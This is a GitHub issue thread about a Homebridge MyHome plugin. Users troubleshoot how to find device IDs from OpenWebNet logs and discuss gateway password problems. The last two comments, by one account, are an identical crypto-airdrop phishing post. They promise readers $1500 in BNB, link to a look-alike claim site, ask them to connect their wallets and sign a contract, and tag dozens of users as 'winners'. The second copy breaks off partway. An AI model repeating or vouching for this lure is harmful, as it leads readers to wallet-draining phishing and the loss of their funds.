### ISSUE TITLE
id explanatoion

### ISSUE THREAD

**Issue by bubez81** [juliensantos87/homebridge-myhome#5]
Hello, can you explain how to write the id? For example, for a light my A PL is 0/2/10

**Comment by bubez81** [comment]
ah sorry and I receive always this message: 
[MyHome] Unable to recognize packet '*98*2##'
[2020-9-23 12:20:19] [MyHome] [210] Fetching power state :false
[2020-9-23 12:20:19] [MyHome] Unable to recognize packet '*98*2##'
[2020-9-23 12:20:50] [MyHome] Unable to recognize packet '*#*0##'
[2020-9-23 12:21:38] [MyHome] Monitor connexion is dead, restart it
[2020-9-23 12:21:38] [MyHome] Start monitoring MyHome server
[2020-9-23 12:21:38] [MyHome] Unable to recognize packet '*98*2##'

**Comment by juliensantos87** [comment]
Hello,

I add more information in the README but can you show me your config file?

the first debug should be
``` 
Sep 26 23:32:35 raspberrypi homebridge[13100]: 2020-09-26T21:32:35.766Z - MON <= *#*1##
Sep 26 23:32:35 raspberrypi homebridge[13100]: 2020-09-26T21:32:35.770Z - MON => *99*1##
Sep 26 23:32:35 raspberrypi homebridge[13100]: 2020-09-26T21:32:35.772Z - MON <= *#*1##

**Comment by bubez81** [comment]
`[2020-9-27 11:33:20] Homebridge v1.2.3 is running on port 51481.
2020-09-27T09:33:20.815Z - MON <= *#*1##
2020-09-27T09:33:20.816Z - MON => *99*1##
2020-09-27T09:33:20.821Z - MON <= *98*2##
unable to recognize packet '*98*2##'
[2020-9-27 11:33:54] [MyHome] [undefined] Fetching power state
[2020-9-27 11:33:54] [MyHome] [11] Fetching target
[2020-9-27 11:33:54] [MyHome] [11] Fetching position
unable to recognize packet '*98*2##'
[2020-9-27 11:34:01] [MyHome] [undefined] Fetching power state
unable to recognize packet '*98*2##'
[2020-9-27 11:34:03] [MyHome] [undefined] Setting power state to on
unable to recognize packet '*98*2##'
[2020-9-27 11:34:03] [MyHome] [undefined] Setting power state to off
unable to recognize packet '*98*2##'
[2020-9-27 11:34:07] [MyHome] [undefined] Setting power state to on`


`        {
            "platform": "MyHome",
            "name": "MyHome",
            "host": "ip",
            "password": "password",
            "lights": [
                3
            ],
            "blinds": [
                {
                    "id": 11,
                    "time": 15
                }
            ]
        }`

it's probably an id problem but I can't understand how to know the id number....I know the address of my devices but are in bus format...for example the light is A0 PL3, but I can't insert 03 as id number and only three is wrong...

**Comment by LeJeko** [comment]
Same issue with this fork and can't understand how to get IDs... (F453)

That's why I'm currently using https://github.com/simont77/homebridge-myhome where I can configure my devices with their B/A/PL address. I've [asked the owner simont77](https://github.com/simont77/homebridge-myhome/issues/3) but he doesn't want to publish it on npm.
I've found this copy (not a fork) who is published if ever: https://github.com/alessandroferra/homebridge-myhome-wip

@juliensantos87: The forks of Simon77 appears to be more complete and simple to configure.
What do you think about testing it ?

My goals are:
1. Simplify the search in the Homebridge Plugins web UI because it's a little bit confusing for now...
![HB MyHome](https://user-images.githubusercontent.com/13176530/94551118-2455a380-0255-11eb-9d4f-56c0cf0134fc.png)
I think Homebridge-myhome should be the reference. Thanks to @juliensantos87 for updating his repo this week ;) 

2. Add some features like realtime blind moving and video doorbell (to the reference repo).

**Comment by bubez81** [comment]
sorry Lejeko and what is this? homebridge-myhome-own?

**Comment by LeJeko** [comment]
I created my fork because simont77 did not want to publish his.
In the meantime, I contacted @ juliensantos87 via npm as I believed the repository home bridge-myhome to be abandoned.
I intend to delete it if we can use this fork.

**Comment by bubez81** [comment]
ah ok! clear

**Comment by juliensantos87** [comment]
For communication with MyHome server I use https://www.npmjs.com/package/myhome
to get your ID you are suppose to be able to connect to your server and ask for configuration

You can try it with telnet `telnet 192.168.1.35 20000`
And try one of this commandes for example `*#1001*0*13##'` => https://github.com/sxpert/myhomejs/blob/master/myhome.js#L324

In my case for me on `F454` it was not easy to read
I just connect with this config

```
    "platforms": [
        {
            "platform": "MyHome",
            "name": "MyHome",
            "host": "192.168.1.35",
            "password": "12345",
            "lights": [],
            "blinds": []
        }
    ] 
```

This give me this logs
```
Oct 05 20:15:41 raspberrypi homebridge[21403]: 2020-10-05T18:15:41.467Z - MON <= *#*1##
Oct 05 20:15:41 raspberrypi homebridge[21403]: 2020-10-05T18:15:41.468Z - MON => *99*1##
Oct 05 20:15:41 raspberrypi homebridge[21403]: 2020-10-05T18:15:41.482Z - MON <= *#*1##
```

When I switch manually a light On and Off it's give me

```
Oct 05 20:25:19 raspberrypi homebridge[21403]: 2020-10-05T18:25:19.884Z - MON <= *1*1*12##
Oct 05 20:25:24 raspberrypi homebridge[21403]: 2020-10-05T18:25:24.724Z - MON <= *1*0*12##
``` 

The first digit it the type, the second is action and the thrid is `ID`
So I know my first ID and I can add it to my config like that `"lights": [12, 13],`

For Blind I used the same process but you have to defind  a time in secondes to be able to simulate closing %

@bubez81 for your probleme it's look like the connection is not right => https://github.com/sxpert/myhomejs/blob/master/myhome.js#L106

Maybe you can check this with this package and make a PR for that?
https://www.npmjs.com/package/myhome

**Comment by bubez81** [comment]
Just to inform you that the connection problem is related to the HMEC password I think, it's not possible with myhomeserver1 to set a range of ip trusted so the only way is to implement the hmec password system

**Comment by juliensantos87** [comment]
my connection is only local and without pass, discuss in this issue https://github.com/sxpert/myhomejs/issues/1
but the npm package is not pushed (I had to checkout manually to connect without pass) https://github.com/sxpert/myhomejs/issues/2

**Comment by bubez81** [comment]
Yes, sadly with myhomeserver 1 gateway it's not possible to create a connection without a password, in essence...this gateway is not supported

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @livo2020, @mrjohannchang, @josephewolff, @zhucongx, @sammanamgain, @luanngominh, @crazylion316, @caoxuwen, @chamsou123, @0xlax, @Ro-Block, @SergejGri, @Shonghor, @nimajneb-relleum, @qzwlinux, @jebediah47, @tomriddlex9, @athif23, @HCHKAU, @kewur, @sumerzhang, @swarupbhc, @ajxmid, @vivek-CR7, @sp035656, @abenzer, @dotWill, @MrLuckyKing, @KuanYuLai, @caigen, @barkerja, @ilsubyeega, @ClarePhang, @pocojang, @ProgrammerZohir, @liflih, @chavoniap, @Dimajarrar, @blackestwhite, @raunak51299, @cawa0505, @motz0815, @totonunez, @altfoxie, @theguptaji, @parkstcompany, @matin417567-LGTM, @qwerty200696, @Zeus-Iqd, @gdtrang

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
